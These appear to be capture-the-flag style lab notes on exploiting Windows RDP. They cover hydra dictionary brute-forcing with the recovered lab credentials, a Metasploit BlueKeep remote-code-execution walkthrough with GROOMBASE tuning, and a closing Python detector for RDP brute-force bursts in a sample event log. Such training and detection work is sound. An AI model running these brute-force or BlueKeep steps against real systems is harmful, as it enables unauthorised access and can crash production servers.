🔬 RDP

Lab 1

🔬 Windows: Insecure RDP Service

  • Target IP: 10.4.18.131

  • RDP exploitation

  • Dictionaries to use:

    • /usr/share/metasploit-framework/data/wordlists/common_users.txt

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.18.131

nmap -sV 10.4.18.131
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  • Use the Metasploit rdp_scanner module to check whether port 3333 is running RDP.

msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 10.4.18.131
set RPORT 3333
run

📌 The RDP is exposed on target port 3333, and not on the default port 3389.

RDP Brute-force

  • Use hydra to find valid usernames and passwords

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.18.131 -s 3333
[3333][rdp] host: 10.4.18.131   login: sysadmin   password: samantha
[3333][rdp] host: 10.4.18.131   login: demo   password: victoria
[3333][rdp] host: 10.4.18.131   login: auditor   password: elizabeth
[3333][rdp] host: 10.4.18.131   login: administrator   password: qwertyuiop

  • freerdp cannot be used in this lab

  • Use xfreerdp to connect to the target via RDP

xfreerdp /u:administrator /p:qwertyuiop /v:10.4.18.131:3333
Reveal Flag: 🚩

port-number-3333


Lab 2 - BlueKeep (Extra)

🔬 Home Lab

I have prepared a vulnerable Windows 2008 R2 virtual machine and connected it to the same network as the Kali virtual machine. On the server, I have activated the RDP service on the default port 3389.

  • Host system: Kali Linux

  • Target system: Windows Server 2008 R2 - IP 192.168.31.131 - Administrator:Eternal17010

  • Exploitation tool:

  • Targeting kernel-space memory and applications can cause system crashes.

  • An attacker can remotely execute arbitrary code, without authentication, by gaining access to a chunk of kernel memory.

  • BlueKeep PoCs (proofs of concept) and exploits can be malicious in nature; use only verified exploit code and modules.

  • Target RDP activated:

Enumeration

nmap -sV -sC 192.168.31.131

📌 RDP port 3389 is open.

Exploitation

msfconsole
search bluekeep
use 0   # index of auxiliary/scanner/rdp/cve_2019_0708_bluekeep in the search results
set RHOSTS 192.168.31.131
exploit
search bluekeep
use 1   # index of exploit/windows/rdp/cve_2019_0708_bluekeep_rce in the search results
set RHOSTS 192.168.31.131
show targets
set target 5
exploit

This exploit can crash the target kernel, so take care in production environments.

Adjusting the exploit

Finding the NPP

  • To make the exploit work, it needs the correct GROOMBASE value, which is the start address of the non-paged pool (NPP).

  • The NPP address can be extracted from a memory dump of the target machine.

  • In VMware, take a snapshot of the target virtual machine (Windows Server 2008 R2).

    • Download the vmss2core tool

    • From the VM (virtual machine) folder, copy the .vmem and .vmsn files to the vmss2core tool folder

    • Run the tool to generate a memory.dmp file

.\vmss2core-sb-8456865.exe -W "WinSrv_2008_R2_x64-Snapshot1.vmsn" "WinSrv_2008_R2_x64-Snapshot1.vmem"

  • Run WinDbg and open the memory.dmp file

    • Run !poolfind a; the output starts with a message giving the non-paged pool range

    • That message gives the start address of the non-paged pool, in this case fffffa8018c08000

  • Edit the exploit and set the GROOMBASE variable if not already set.

    • In my case it is already set to the above address, for the 2008 R2 (6.1.7601 x64 - VMware 15.1) target number 5.

  • Save the exploit file and run reload_all in the Metasploit interface.

  • Set the GROOMSIZE to 50.

msfconsole
search bluekeep
use 1   # index of exploit/windows/rdp/cve_2019_0708_bluekeep_rce in the search results
set RHOSTS 192.168.31.131
show targets
set target 5
set GROOMSIZE 50
exploit

Lab 3 (Extra)

Windows RDP: Dictionary Attack

  • Target IP: 10.4.22.41

  • RDP exploitation

  • Dictionaries to use:

    • /usr/share/metasploit-framework/data/wordlists/common_users.txt

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

nmap 10.4.22.41

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.22.41 -s 3389
xfreerdp /u:administrator /p:bubbles /v:10.4.22.41
# default port is 3389
Reveal Flag: 🚩

sysadmin-stephaie-123
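From the target's side, the dictionary attacks in Lab 1 and Lab 3 both show up in the Windows Security log as a burst of failed RemoteInteractive logons (Event ID 4625, logon type 10) from one source against many accounts, followed by a success (4624) once hydra finds a valid pair. The following Python detection pass is an added example, not part of the original lab notes; it runs over a constructed, simplified event sample, and the one-line log format, addresses and account names are assumptions.

```python
from collections import defaultdict, namedtuple
from datetime import datetime, timedelta

# Constructed sample (not a real capture), one event per line:
# "<timestamp> <EventID> <LogonType> <account> <source IP>"
# 4625 = failed logon, 4624 = successful logon, logon type 10 = RemoteInteractive (RDP).
SAMPLE_LOG = """\
2024-01-10T10:00:01 4625 10 admin 192.168.31.5
2024-01-10T10:00:02 4625 10 sysadmin 192.168.31.5
2024-01-10T10:00:03 4625 10 demo 192.168.31.5
2024-01-10T10:00:04 4625 10 auditor 192.168.31.5
2024-01-10T10:00:05 4625 10 administrator 192.168.31.5
2024-01-10T10:00:06 4625 10 administrator 192.168.31.5
2024-01-10T10:00:09 4624 10 administrator 192.168.31.5
2024-01-10T10:30:00 4625 10 jdoe 192.168.31.77
2024-01-10T10:32:00 4625 3 svc_backup 192.168.31.9
"""

Event = namedtuple("Event", "ts event_id logon_type account source")

def parse_events(text):
    """Parse the constructed log format above into Event tuples."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, eid, ltype, acct, src = line.split()
            events.append(Event(datetime.fromisoformat(ts), int(eid), int(ltype), acct, src))
    return events

def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=2)):
    """Flag each source with >= threshold failed RDP logons inside one window and
    record whether an RDP success from that source followed (credentials found)."""
    by_source = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        if e.logon_type == 10:  # only RemoteInteractive (RDP) logons matter here
            by_source[e.source].append(e)
    findings = {}
    for src, evs in by_source.items():
        fails = [e for e in evs if e.event_id == 4625]
        start = 0
        for i, e in enumerate(fails):  # sliding window over failure timestamps
            while e.ts - fails[start].ts > window:
                start += 1
            if i - start + 1 >= threshold:
                success = next((s.account for s in evs
                                if s.event_id == 4624 and s.ts >= e.ts), None)
                findings[src] = {"failures": len(fails), "success": success,
                                 "accounts": sorted({f.account for f in fails})}
                break
    return findings
```

The single type-10 failure from 192.168.31.77 and the network (type 3) failure from 192.168.31.9 are left alone; only the burst source is reported, together with the account that later logged in successfully.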

